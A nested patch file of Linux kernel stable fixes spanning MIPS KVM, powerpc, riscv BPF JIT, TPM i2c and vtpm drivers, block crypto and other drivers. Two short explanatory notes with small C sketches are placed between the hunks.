+ void kvm_own_msa(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int sr, cfg5;
+ 
+ 	preempt_disable();
+diff --git a/arch/mips/kvm/stats.c b/arch/mips/kvm/stats.c
+index 53f851a615542..3e6682018fbe6 100644
+--- a/arch/mips/kvm/stats.c
++++ b/arch/mips/kvm/stats.c
+@@ -54,9 +54,9 @@ void kvm_mips_dump_stats(struct kvm_vcpu *vcpu)
+ 	kvm_info("\nKVM VCPU[%d] COP0 Access Profile:\n", vcpu->vcpu_id);
+ 	for (i = 0; i < N_MIPS_COPROC_REGS; i++) {
+ 		for (j = 0; j < N_MIPS_COPROC_SEL; j++) {
+-			if (vcpu->arch.cop0->stat[i][j])
++			if (vcpu->arch.cop0.stat[i][j])
+ 				kvm_info("%s[%d]: %lu\n", kvm_cop0_str[i], j,
+-					 vcpu->arch.cop0->stat[i][j]);
++					 vcpu->arch.cop0.stat[i][j]);
+ 		}
+ 	}
+ #endif
+diff --git a/arch/mips/kvm/trace.h b/arch/mips/kvm/trace.h
+index a8c7fd7bf6d26..136c3535a1cbb 100644
+--- a/arch/mips/kvm/trace.h
++++ b/arch/mips/kvm/trace.h
+@@ -322,11 +322,11 @@ TRACE_EVENT_FN(kvm_guest_mode_change,
+ 	    ),
+ 
+ 	    TP_fast_assign(
+-			__entry->epc = kvm_read_c0_guest_epc(vcpu->arch.cop0);
++			__entry->epc = kvm_read_c0_guest_epc(&vcpu->arch.cop0);
+ 			__entry->pc = vcpu->arch.pc;
+-			__entry->badvaddr = kvm_read_c0_guest_badvaddr(vcpu->arch.cop0);
+-			__entry->status = kvm_read_c0_guest_status(vcpu->arch.cop0);
+-			__entry->cause = kvm_read_c0_guest_cause(vcpu->arch.cop0);
++			__entry->badvaddr = kvm_read_c0_guest_badvaddr(&vcpu->arch.cop0);
++			__entry->status = kvm_read_c0_guest_status(&vcpu->arch.cop0);
++			__entry->cause = kvm_read_c0_guest_cause(&vcpu->arch.cop0);
+ 	    ),
+ 
+ 	    TP_printk("EPC: 0x%08lx PC: 0x%08lx Status: 0x%08x Cause: 0x%08x BadVAddr: 0x%08lx",
+diff --git a/arch/mips/kvm/vz.c b/arch/mips/kvm/vz.c
+index c706f5890a05c..c8f7d793bc633 100644
+--- a/arch/mips/kvm/vz.c
++++ b/arch/mips/kvm/vz.c
+@@ -422,7 +422,7 @@ static void _kvm_vz_restore_htimer(struct kvm_vcpu *vcpu,
+  */
+ static void kvm_vz_restore_timer(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 cause, compare;
+ 
+ 	compare = kvm_read_sw_gc0_compare(cop0);
+@@ -517,7 +517,7 @@ static void _kvm_vz_save_htimer(struct kvm_vcpu *vcpu,
+  */
+ static void kvm_vz_save_timer(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	u32 gctl0, compare, cause;
+ 
+ 	gctl0 = read_c0_guestctl0();
+@@ -863,7 +863,7 @@ static unsigned long mips_process_maar(unsigned int op, unsigned long val)
+ 
+ static void kvm_write_maari(struct kvm_vcpu *vcpu, unsigned long val)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	val &= MIPS_MAARI_INDEX;
+ 	if (val == MIPS_MAARI_INDEX)
+@@ -876,7 +876,7 @@ static enum emulation_result kvm_vz_gpsi_cop0(union mips_instruction inst,
+ 					      u32 *opc, u32 cause,
+ 					      struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	enum emulation_result er = EMULATE_DONE;
+ 	u32 rt, rd, sel;
+ 	unsigned long curr_pc;
+@@ -1911,7 +1911,7 @@ static int kvm_vz_get_one_reg(struct kvm_vcpu *vcpu,
+ 			      const struct kvm_one_reg *reg,
+ 			      s64 *v)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int idx;
+ 
+ 	switch (reg->id) {
+@@ -2081,7 +2081,7 @@ static int kvm_vz_get_one_reg(struct kvm_vcpu *vcpu,
+ 	case KVM_REG_MIPS_CP0_MAARI:
+ 		if (!cpu_guest_has_maar || cpu_guest_has_dyn_maar)
+ 			return -EINVAL;
+-		*v = kvm_read_sw_gc0_maari(vcpu->arch.cop0);
++		*v = kvm_read_sw_gc0_maari(&vcpu->arch.cop0);
+ 		break;
+ #ifdef CONFIG_64BIT
+ 	case KVM_REG_MIPS_CP0_XCONTEXT:
+@@ -2135,7 +2135,7 @@ static int kvm_vz_set_one_reg(struct kvm_vcpu *vcpu,
+ 			      const struct kvm_one_reg *reg,
+ 			      s64 v)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned int idx;
+ 	int ret = 0;
+ 	unsigned int cur, change;
+@@ -2562,7 +2562,7 @@ static void kvm_vz_vcpu_load_tlb(struct kvm_vcpu *vcpu, int cpu)
+ 
+ static int kvm_vz_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	bool migrated, all;
+ 
+ 	/*
+@@ -2704,7 +2704,7 @@ static int kvm_vz_vcpu_load(struct kvm_vcpu *vcpu, int cpu)
+ 
+ static int kvm_vz_vcpu_put(struct kvm_vcpu *vcpu, int cpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 
+ 	if (current->flags & PF_VCPU)
+ 		kvm_vz_vcpu_save_wired(vcpu);
+@@ -3076,7 +3076,7 @@ static void kvm_vz_vcpu_uninit(struct kvm_vcpu *vcpu)
+ 
+ static int kvm_vz_vcpu_setup(struct kvm_vcpu *vcpu)
+ {
+-	struct mips_coproc *cop0 = vcpu->arch.cop0;
++	struct mips_coproc *cop0 = &vcpu->arch.cop0;
+ 	unsigned long count_hz = 100*1000*1000; /* default to 100 MHz */
+ 
+ 	/*
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 894d48cd04920..054844153b1fd 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -402,3 +402,11 @@ checkbin:
+ 		echo -n '*** Please use a different binutils version.' ; \
+ 		false ; \
+ 	fi
++	@if test "x${CONFIG_FTRACE_MCOUNT_USE_RECORDMCOUNT}" = "xy" -a \
++		"x${CONFIG_LD_IS_BFD}" = "xy" -a \
++		"${CONFIG_LD_VERSION}" = "23700" ; then \
++		echo -n '*** binutils 2.37 drops unused section symbols, which recordmcount ' ; \
++		echo 'is unable to handle.' ; \
++		echo '*** Please use a different binutils version.' ; \
++		false ; \
++	fi
+diff --git a/arch/powerpc/kernel/security.c b/arch/powerpc/kernel/security.c
+index 206475e3e0b48..4856e1a5161cc 100644
+--- a/arch/powerpc/kernel/security.c
++++ b/arch/powerpc/kernel/security.c
+@@ -364,26 +364,27 @@ ssize_t cpu_show_spec_store_bypass(struct device *dev, struct device_attribute *
+ 
+ static int ssb_prctl_get(struct task_struct *task)
+ {
++	/*
++	 * The STF_BARRIER feature is on by default, so if it's off that means
++	 * firmware has explicitly said the CPU is not vulnerable via either
++	 * the hypercall or device tree.
++	 */
++	if (!security_ftr_enabled(SEC_FTR_STF_BARRIER))
++		return PR_SPEC_NOT_AFFECTED;
++
++	/*
++	 * If the system's CPU has no known barrier (see setup_stf_barrier())
++	 * then assume that the CPU is not vulnerable.
++	 */
+ 	if (stf_enabled_flush_types == STF_BARRIER_NONE)
+-		/*
+-		 * We don't have an explicit signal from firmware that we're
+-		 * vulnerable or not, we only have certain CPU revisions that
+-		 * are known to be vulnerable.
+-		 *
+-		 * We assume that if we're on another CPU, where the barrier is
+-		 * NONE, then we are not vulnerable.
+-		 */
+ 		return PR_SPEC_NOT_AFFECTED;
+-	else
+-		/*
+-		 * If we do have a barrier type then we are vulnerable. The
+-		 * barrier is not a global or per-process mitigation, so the
+-		 * only value we can report here is PR_SPEC_ENABLE, which
+-		 * appears as "vulnerable" in /proc.
+-		 */
+-		return PR_SPEC_ENABLE;
+-
+-	return -EINVAL;
++
++	/*
++	 * Otherwise the CPU is vulnerable. The barrier is not a global or
++	 * per-process mitigation, so the only value that can be reported here
++	 * is PR_SPEC_ENABLE, which appears as "vulnerable" in /proc.
++	 */
++	return PR_SPEC_ENABLE;
+ }
+ 
+ int arch_prctl_spec_ctrl_get(struct task_struct *task, unsigned long which)
+diff --git a/arch/powerpc/mm/book3s64/hash_native.c b/arch/powerpc/mm/book3s64/hash_native.c
+index 9342e79870dfd..430d1d935a7cb 100644
+--- a/arch/powerpc/mm/book3s64/hash_native.c
++++ b/arch/powerpc/mm/book3s64/hash_native.c
+@@ -328,10 +328,12 @@ static long native_hpte_insert(unsigned long hpte_group, unsigned long vpn,
+ 
+ static long native_hpte_remove(unsigned long hpte_group)
+ {
++	unsigned long hpte_v, flags;
+ 	struct hash_pte *hptep;
+ 	int i;
+ 	int slot_offset;
+-	unsigned long hpte_v;
++
++	local_irq_save(flags);
+ 
+ 	DBG_LOW("    remove(group=%lx)\n", hpte_group);
+ 
+@@ -356,13 +358,16 @@ static long native_hpte_remove(unsigned long hpte_group)
+ 		slot_offset &= 0x7;
+ 	}
+ 
+-	if (i == HPTES_PER_GROUP)
+-		return -1;
++	if (i == HPTES_PER_GROUP) {
++		i = -1;
++		goto out;
++	}
+ 
+ 	/* Invalidate the hpte. NOTE: this also unlocks it */
+ 	release_hpte_lock();
+ 	hptep->v = 0;
+-
++out:
++	local_irq_restore(flags);
+ 	return i;
+ }
+ 
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 9390cdff39ffc..7c4852af9e3f1 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -1187,7 +1187,7 @@ static void __init reserve_crashkernel(void)
+ 	 */
+ 	crash_base = memblock_phys_alloc_range(crash_size, PMD_SIZE,
+ 					       search_start,
+-					       min(search_end, (unsigned long) SZ_4G));
++					       min(search_end, (unsigned long)(SZ_4G - 1)));
+ 	if (crash_base == 0) {
+ 		/* Try again without restricting region to 32bit addressible memory */
+ 		crash_base = memblock_phys_alloc_range(crash_size, PMD_SIZE,
+diff --git a/arch/riscv/net/bpf_jit.h b/arch/riscv/net/bpf_jit.h
+index d926e0f7ef571..5ee21a19969c9 100644
+--- a/arch/riscv/net/bpf_jit.h
++++ b/arch/riscv/net/bpf_jit.h
+@@ -69,7 +69,7 @@ struct rv_jit_context {
+ 	struct bpf_prog *prog;
+ 	u16 *insns;		/* RV insns */
+ 	int ninsns;
+-	int body_len;
++	int prologue_len;
+ 	int epilogue_offset;
+ 	int *offset;		/* BPF to RV */
+ 	int nexentries;
+@@ -216,8 +216,8 @@ static inline int rv_offset(int insn, int off, struct rv_jit_context *ctx)
+ 	int from, to;
+ 
+ 	off++; /* BPF branch is from PC+1, RV is from PC */
+-	from = (insn > 0) ? ctx->offset[insn - 1] : 0;
+-	to = (insn + off > 0) ? ctx->offset[insn + off - 1] : 0;
++	from = (insn > 0) ? ctx->offset[insn - 1] : ctx->prologue_len;
++	to = (insn + off > 0) ? ctx->offset[insn + off - 1] : ctx->prologue_len;
+ 	return ninsns_rvoff(to - from);
+ }
+ 
+diff --git a/arch/riscv/net/bpf_jit_core.c b/arch/riscv/net/bpf_jit_core.c
+index 737baf8715da7..7a26a3e1c73cf 100644
+--- a/arch/riscv/net/bpf_jit_core.c
++++ b/arch/riscv/net/bpf_jit_core.c
+@@ -44,7 +44,7 @@ struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
+ 	unsigned int prog_size = 0, extable_size = 0;
+ 	bool tmp_blinded = false, extra_pass = false;
+ 	struct bpf_prog *tmp, *orig_prog = prog;
+-	int pass = 0, prev_ninsns = 0, prologue_len, i;
++	int pass = 0, prev_ninsns = 0, i;
+ 	struct rv_jit_data *jit_data;
+ 	struct rv_jit_context *ctx;
+ 
+@@ -83,6 +83,12 @@ struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
+ 		prog = orig_prog;
+ 		goto out_offset;
+ 	}
++
++	if (build_body(ctx, extra_pass, NULL)) {
++		prog = orig_prog;
++		goto out_offset;
++	}
++
+ 	for (i = 0; i < prog->len; i++) {
+ 		prev_ninsns += 32;
+ 		ctx->offset[i] = prev_ninsns;
+@@ -91,12 +97,15 @@ struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
+ 	for (i = 0; i < NR_JIT_ITERATIONS; i++) {
+ 		pass++;
+ 		ctx->ninsns = 0;
++
++		bpf_jit_build_prologue(ctx);
++		ctx->prologue_len = ctx->ninsns;
++
+ 		if (build_body(ctx, extra_pass, ctx->offset)) {
+ 			prog = orig_prog;
+ 			goto out_offset;
+ 		}
+-		ctx->body_len = ctx->ninsns;
+-		bpf_jit_build_prologue(ctx);
++
+ 		ctx->epilogue_offset = ctx->ninsns;
+ 		bpf_jit_build_epilogue(ctx);
+ 
+@@ -162,10 +171,8 @@ skip_init_ctx:
+ 
+ 	if (!prog->is_func || extra_pass) {
+ 		bpf_jit_binary_lock_ro(jit_data->header);
+-		prologue_len = ctx->epilogue_offset - ctx->body_len;
+ 		for (i = 0; i < prog->len; i++)
+-			ctx->offset[i] = ninsns_rvoff(prologue_len +
+-						      ctx->offset[i]);
++			ctx->offset[i] = ninsns_rvoff(ctx->offset[i]);
+ 		bpf_prog_fill_jited_linfo(prog, ctx->offset);
+ out_offset:
+ 		kfree(ctx->offset);
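
The reordering above matters because ctx->offset[] entries are now recorded with the prologue already emitted, so a branch whose target is BPF insn 0 must resolve to prologue_len rather than to 0. A userspace sketch of the fixed rv_offset() arithmetic, with hypothetical offsets (the kernel additionally scales the result to bytes via ninsns_rvoff()):

    #include <stdio.h>

    /* offset[i]: RV insns emitted through BPF insn i, counted from the
     * start of the image (prologue included); prologue_len is where
     * BPF insn 0 begins. */
    static int rv_offset(const int *offset, int prologue_len, int insn, int off)
    {
            int from, to;

            off++; /* BPF branch is from PC+1, RV is from PC */
            from = (insn > 0) ? offset[insn - 1] : prologue_len;
            to = (insn + off > 0) ? offset[insn + off - 1] : prologue_len;
            return to - from;
    }

    int main(void)
    {
            int offset[] = { 10, 12, 14 }; /* prologue_len = 8, 2 RV insns each */

            /* Branch at BPF insn 2 back to insn 0 (off = -3): the target is
             * the first body insn at RV offset 8. Before the fix, insn 0
             * resolved to offset 0, i.e. into the prologue. */
            printf("%d\n", rv_offset(offset, 8, 2, -3)); /* prints -4 */
            return 0;
    }
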
+diff --git a/arch/s390/Makefile b/arch/s390/Makefile
+index ed646c583e4fe..5ed242897b0d2 100644
+--- a/arch/s390/Makefile
++++ b/arch/s390/Makefile
+@@ -27,6 +27,7 @@ KBUILD_CFLAGS_DECOMPRESSOR += -fno-delete-null-pointer-checks -msoft-float -mbac
+ KBUILD_CFLAGS_DECOMPRESSOR += -fno-asynchronous-unwind-tables
+ KBUILD_CFLAGS_DECOMPRESSOR += -ffreestanding
+ KBUILD_CFLAGS_DECOMPRESSOR += -fno-stack-protector
++KBUILD_CFLAGS_DECOMPRESSOR += -fPIE
+ KBUILD_CFLAGS_DECOMPRESSOR += $(call cc-disable-warning, address-of-packed-member)
+ KBUILD_CFLAGS_DECOMPRESSOR += $(if $(CONFIG_DEBUG_INFO),-g)
+ KBUILD_CFLAGS_DECOMPRESSOR += $(if $(CONFIG_DEBUG_INFO_DWARF4), $(call cc-option, -gdwarf-4,))
+diff --git a/arch/x86/events/intel/core.c b/arch/x86/events/intel/core.c
+index 5a1d0ea402e41..2fb5e1541efc1 100644
+--- a/arch/x86/events/intel/core.c
++++ b/arch/x86/events/intel/core.c
+@@ -3975,6 +3975,13 @@ static int intel_pmu_hw_config(struct perf_event *event)
+ 		struct perf_event *leader = event->group_leader;
+ 		struct perf_event *sibling = NULL;
+ 
++		/*
++		 * When this memload event is also the first event (no group
++		 * exists yet), then there is no aux event before it.
++		 */
++		if (leader == event)
++			return -ENODATA;
++
+ 		if (!is_mem_loads_aux_event(leader)) {
+ 			for_each_sibling_event(sibling, leader) {
+ 				if (is_mem_loads_aux_event(sibling))
+diff --git a/arch/xtensa/platforms/iss/network.c b/arch/xtensa/platforms/iss/network.c
+index 9ac46ab3a296c..119345eeb04c9 100644
+--- a/arch/xtensa/platforms/iss/network.c
++++ b/arch/xtensa/platforms/iss/network.c
+@@ -237,7 +237,7 @@ static int tuntap_probe(struct iss_net_private *lp, int index, char *init)
+ 
+ 	init += sizeof(TRANSPORT_TUNTAP_NAME) - 1;
+ 	if (*init == ',') {
+-		rem = split_if_spec(init + 1, &mac_str, &dev_name);
++		rem = split_if_spec(init + 1, &mac_str, &dev_name, NULL);
+ 		if (rem != NULL) {
+ 			pr_err("%s: extra garbage on specification : '%s'\n",
+ 			       dev->name, rem);
+diff --git a/block/blk-crypto-profile.c b/block/blk-crypto-profile.c
+index 3290c03c9918d..aa7fc1436893c 100644
+--- a/block/blk-crypto-profile.c
++++ b/block/blk-crypto-profile.c
+@@ -79,7 +79,14 @@ int blk_crypto_profile_init(struct blk_crypto_profile *profile,
+ 	unsigned int slot_hashtable_size;
+ 
+ 	memset(profile, 0, sizeof(*profile));
+-	init_rwsem(&profile->lock);
++
++	/*
++	 * profile->lock of an underlying device can nest inside profile->lock
++	 * of a device-mapper device, so use a dynamic lock class to avoid
++	 * false-positive lockdep reports.
++	 */
++	lockdep_register_key(&profile->lockdep_key);
++	__init_rwsem(&profile->lock, "&profile->lock", &profile->lockdep_key);
+ 
+ 	if (num_slots == 0)
+ 		return 0;
+@@ -89,7 +96,7 @@ int blk_crypto_profile_init(struct blk_crypto_profile *profile,
+ 	profile->slots = kvcalloc(num_slots, sizeof(profile->slots[0]),
+ 				  GFP_KERNEL);
+ 	if (!profile->slots)
+-		return -ENOMEM;
++		goto err_destroy;
+ 
+ 	profile->num_slots = num_slots;
+ 
+@@ -441,6 +448,7 @@ void blk_crypto_profile_destroy(struct blk_crypto_profile *profile)
+ {
+ 	if (!profile)
+ 		return;
++	lockdep_unregister_key(&profile->lockdep_key);
+ 	kvfree(profile->slot_hashtable);
+ 	kvfree_sensitive(profile->slots,
+ 			 sizeof(profile->slots[0]) * profile->num_slots);
+diff --git a/drivers/base/regmap/regmap-irq.c b/drivers/base/regmap/regmap-irq.c
+index 3de89795f5843..18fc1c4360817 100644
+--- a/drivers/base/regmap/regmap-irq.c
++++ b/drivers/base/regmap/regmap-irq.c
+@@ -843,7 +843,7 @@ int regmap_add_irq_chip_fwnode(struct fwnode_handle *fwnode,
+ 		if (!d->config_buf)
+ 			goto err_alloc;
+ 
+-		for (i = 0; i < chip->num_config_regs; i++) {
++		for (i = 0; i < chip->num_config_bases; i++) {
+ 			d->config_buf[i] = kcalloc(chip->num_config_regs,
+ 						   sizeof(**d->config_buf),
+ 						   GFP_KERNEL);
+diff --git a/drivers/bus/intel-ixp4xx-eb.c b/drivers/bus/intel-ixp4xx-eb.c
+index 91db001eb69a6..972603ed06a6c 100644
+--- a/drivers/bus/intel-ixp4xx-eb.c
++++ b/drivers/bus/intel-ixp4xx-eb.c
+@@ -33,7 +33,7 @@
+ #define IXP4XX_EXP_TIMING_STRIDE	0x04
+ #define IXP4XX_EXP_CS_EN		BIT(31)
+ #define IXP456_EXP_PAR_EN		BIT(30) /* Only on IXP45x and IXP46x */
+-#define IXP4XX_EXP_T1_MASK		GENMASK(28, 27)
++#define IXP4XX_EXP_T1_MASK		GENMASK(29, 28)
+ #define IXP4XX_EXP_T1_SHIFT		28
+ #define IXP4XX_EXP_T2_MASK		GENMASK(27, 26)
+ #define IXP4XX_EXP_T2_SHIFT		26
+diff --git a/drivers/char/hw_random/imx-rngc.c b/drivers/char/hw_random/imx-rngc.c
+index a1c24148ed314..75fb46298a87b 100644
+--- a/drivers/char/hw_random/imx-rngc.c
++++ b/drivers/char/hw_random/imx-rngc.c
+@@ -110,7 +110,7 @@ static int imx_rngc_self_test(struct imx_rngc *rngc)
+ 	cmd = readl(rngc->base + RNGC_COMMAND);
+ 	writel(cmd | RNGC_CMD_SELF_TEST, rngc->base + RNGC_COMMAND);
+ 
+-	ret = wait_for_completion_timeout(&rngc->rng_op_done, RNGC_TIMEOUT);
++	ret = wait_for_completion_timeout(&rngc->rng_op_done, msecs_to_jiffies(RNGC_TIMEOUT));
+ 	imx_rngc_irq_mask_clear(rngc);
+ 	if (!ret)
+ 		return -ETIMEDOUT;
+@@ -187,9 +187,7 @@ static int imx_rngc_init(struct hwrng *rng)
+ 		cmd = readl(rngc->base + RNGC_COMMAND);
+ 		writel(cmd | RNGC_CMD_SEED, rngc->base + RNGC_COMMAND);
+ 
+-		ret = wait_for_completion_timeout(&rngc->rng_op_done,
+-				RNGC_TIMEOUT);
+-
++		ret = wait_for_completion_timeout(&rngc->rng_op_done, msecs_to_jiffies(RNGC_TIMEOUT));
+ 		if (!ret) {
+ 			ret = -ETIMEDOUT;
+ 			goto err;
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index 95d847c9de79a..d7ef4d0a7409f 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -515,6 +515,7 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+  * 6.x.y.z series: 6.0.18.6 +
+  * 3.x.y.z series: 3.57.y.5 +
+  */
++#ifdef CONFIG_X86
+ static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
+ {
+ 	u32 val1, val2;
+@@ -563,6 +564,12 @@ release:
+ 
+ 	return true;
+ }
++#else
++static inline bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
++{
++	return false;
++}
++#endif /* CONFIG_X86 */
+ 
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 916f4ff246c14..cbbedf52607c0 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -563,15 +563,18 @@ static int crb_map_io(struct acpi_device *device, struct crb_priv *priv,
+ 	u32 rsp_size;
+ 	int ret;
+ 
+-	INIT_LIST_HEAD(&acpi_resource_list);
+-	ret = acpi_dev_get_resources(device, &acpi_resource_list,
+-				     crb_check_resource, iores_array);
+-	if (ret < 0)
+-		return ret;
+-	acpi_dev_free_resource_list(&acpi_resource_list);
+-
+-	/* Pluton doesn't appear to define ACPI memory regions */
++	/*
++	 * Pluton sometimes does not define ACPI memory regions.
++	 * Mapping is then done in crb_map_pluton
++	 */
+ 	if (priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		INIT_LIST_HEAD(&acpi_resource_list);
++		ret = acpi_dev_get_resources(device, &acpi_resource_list,
++					     crb_check_resource, iores_array);
++		if (ret < 0)
++			return ret;
++		acpi_dev_free_resource_list(&acpi_resource_list);
++
+ 		if (resource_type(iores_array) != IORESOURCE_MEM) {
+ 			dev_err(dev, FW_BUG "TPM2 ACPI table does not define a memory resource\n");
+ 			return -EINVAL;
+diff --git a/drivers/char/tpm/tpm_tis_i2c.c b/drivers/char/tpm/tpm_tis_i2c.c
+index f3a7251c8e38f..9586e0857a3e8 100644
+--- a/drivers/char/tpm/tpm_tis_i2c.c
++++ b/drivers/char/tpm/tpm_tis_i2c.c
+@@ -189,21 +189,28 @@ static int tpm_tis_i2c_read_bytes(struct tpm_tis_data *data, u32 addr, u16 len,
+ 	int ret;
+ 
+ 	for (i = 0; i < TPM_RETRY; i++) {
+-		/* write register */
+-		msg.len = sizeof(reg);
+-		msg.buf = &reg;
+-		msg.flags = 0;
+-		ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
+-		if (ret < 0)
+-			return ret;
+-
+-		/* read data */
+-		msg.buf = result;
+-		msg.len = len;
+-		msg.flags = I2C_M_RD;
+-		ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
+-		if (ret < 0)
+-			return ret;
++		u16 read = 0;
++
++		while (read < len) {
++			/* write register */
++			msg.len = sizeof(reg);
++			msg.buf = &reg;
++			msg.flags = 0;
++			ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
++			if (ret < 0)
++				return ret;
++
++			/* read data */
++			msg.buf = result + read;
++			msg.len = len - read;
++			msg.flags = I2C_M_RD;
++			if (msg.len > I2C_SMBUS_BLOCK_MAX)
++				msg.len = I2C_SMBUS_BLOCK_MAX;
++			ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
++			if (ret < 0)
++				return ret;
++			read += msg.len;
++		}
+ 
+ 		ret = tpm_tis_i2c_sanity_check_read(reg, len, result);
+ 		if (ret == 0)
+@@ -223,19 +230,27 @@ static int tpm_tis_i2c_write_bytes(struct tpm_tis_data *data, u32 addr, u16 len,
+ 	struct i2c_msg msg = { .addr = phy->i2c_client->addr };
+ 	u8 reg = tpm_tis_i2c_address_to_register(addr);
+ 	int ret;
++	u16 wrote = 0;
+ 
+ 	if (len > TPM_BUFSIZE - 1)
+ 		return -EIO;
+ 
+-	/* write register and data in one go */
+ 	phy->io_buf[0] = reg;
+-	memcpy(phy->io_buf + sizeof(reg), value, len);
+-
+-	msg.len = sizeof(reg) + len;
+ 	msg.buf = phy->io_buf;
+-	ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
+-	if (ret < 0)
+-		return ret;
++	while (wrote < len) {
++		/* write register and data in one go */
++		msg.len = sizeof(reg) + len - wrote;
++		if (msg.len > I2C_SMBUS_BLOCK_MAX)
++			msg.len = I2C_SMBUS_BLOCK_MAX;
++
++		memcpy(phy->io_buf + sizeof(reg), value + wrote,
++		       msg.len - sizeof(reg));
++
++		ret = tpm_tis_i2c_retry_transfer_until_ack(data, &msg);
++		if (ret < 0)
++			return ret;
++		wrote += msg.len - sizeof(reg);
++	}
+ 
+ 	return 0;
+ }
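
Both rewritten paths above share one shape: a transfer may move at most I2C_SMBUS_BLOCK_MAX (32) bytes, so an access of arbitrary length is split into bounded chunks and a cursor advanced until everything has moved. A standalone sketch of that loop, with the actual i2c transfer stubbed out:

    #include <string.h>

    #define I2C_SMBUS_BLOCK_MAX 32

    /* stand-in for one bounded i2c_transfer(); just fills the chunk */
    static int xfer_chunk(unsigned char *buf, unsigned int n)
    {
            memset(buf, 0xa5, n);
            return 0;
    }

    static int read_all(unsigned char *result, unsigned int len)
    {
            unsigned int done = 0;

            while (done < len) {
                    unsigned int n = len - done;

                    if (n > I2C_SMBUS_BLOCK_MAX)
                            n = I2C_SMBUS_BLOCK_MAX;
                    if (xfer_chunk(result + done, n) < 0)
                            return -1;
                    done += n;
            }
            return 0;
    }

    int main(void)
    {
            unsigned char buf[70];

            return read_all(buf, sizeof(buf)); /* 32 + 32 + 6 byte chunks */
    }
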
+diff --git a/drivers/char/tpm/tpm_vtpm_proxy.c b/drivers/char/tpm/tpm_vtpm_proxy.c
+index 5c865987ba5c1..30e953988cabe 100644
+--- a/drivers/char/tpm/tpm_vtpm_proxy.c
++++ b/drivers/char/tpm/tpm_vtpm_proxy.c
+@@ -683,37 +683,21 @@ static struct miscdevice vtpmx_miscdev = {
+ 	.fops = &vtpmx_fops,
+ };
+ 
+-static int vtpmx_init(void)
+-{
+-	return misc_register(&vtpmx_miscdev);
+-}
+-
+-static void vtpmx_cleanup(void)
+-{
+-	misc_deregister(&vtpmx_miscdev);
+-}
+-
+ static int __init vtpm_module_init(void)
+ {
+ 	int rc;
+ 
+-	rc = vtpmx_init();
+-	if (rc) {
+-		pr_err("couldn't create vtpmx device\n");
+-		return rc;
+-	}
+-
+ 	workqueue = create_workqueue("tpm-vtpm");
+ 	if (!workqueue) {
+ 		pr_err("couldn't create workqueue\n");
+-		rc = -ENOMEM;
+-		goto err_vtpmx_cleanup;
++		return -ENOMEM;
+ 	}
+ 
+-	return 0;
+-
+-err_vtpmx_cleanup:
+-	vtpmx_cleanup();
++	rc = misc_register(&vtpmx_miscdev);
++	if (rc) {
++		pr_err("couldn't create vtpmx device\n");
++		destroy_workqueue(workqueue);
++	}
+ 
+ 	return rc;
+ }
+@@ -721,7 +705,7 @@ err_vtpmx_cleanup:
+ static void __exit vtpm_module_exit(void)
+ {
+ 	destroy_workqueue(workqueue);
+-	vtpmx_cleanup();
++	misc_deregister(&vtpmx_miscdev);
+ }
+ 
+ module_init(vtpm_module_init);
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index 80f4e2d14e046..2d674126160fe 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -755,7 +755,7 @@ svc_create_memory_pool(struct platform_device *pdev,
+ 	end = rounddown(sh_memory->addr + sh_memory->size, PAGE_SIZE);
+ 	paddr = begin;
+ 	size = end - begin;
+-	va = memremap(paddr, size, MEMREMAP_WC);
++	va = devm_memremap(dev, paddr, size, MEMREMAP_WC);
+ 	if (!va) {
+ 		dev_err(dev, "fail to remap shared memory\n");
+ 		return ERR_PTR(-EINVAL);
